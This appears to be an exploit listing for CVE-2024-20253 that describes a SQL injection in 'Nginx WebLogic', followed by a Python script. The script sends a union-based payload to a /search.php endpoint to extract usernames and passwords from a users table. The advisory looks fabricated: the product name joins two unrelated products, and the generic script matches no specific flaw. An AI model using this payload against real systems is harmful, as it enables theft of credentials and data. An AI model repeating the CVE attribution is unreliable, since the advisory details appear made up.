Critical Severity
CVE-2024-20253
Published: Jun 27, 2025
This exploit targets a sqli vulnerability in Nginx WebLogic.
The vulnerability allows an attacker to:
- Extract sensitive database information
- Modify or delete database records
- Potentially gain administrative access
This vulnerability has been assigned CVE-2024-20253 with a CVSS score of 9.9.
Nginx WebLogic versions prior to latest security update
#!/usr/bin/env python3
import requests
import sys
def exploit_sqli(target_url):
"""
SQL Injection Exploit
Educational purposes only - do not use against systems you do not own
"""
# Basic union-based SQL injection payload
payload = "1' UNION SELECT 1,username,password,4,5 FROM users--"
params = {
"id": payload,
"submit": "Search"
}
try:
response = requests.get(f"{target_url}/search.php", params=params)
if "admin" in response.text.lower():
print("[+] SQL Injection successful - User data extracted")
print("[+] Check response for leaked credentials")
else:
print("[-] Injection failed or no data found")
except Exception as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 sqli_exploit.py <target_url>")
sys.exit(1)
target = sys.argv[1]
exploit_sqli(target)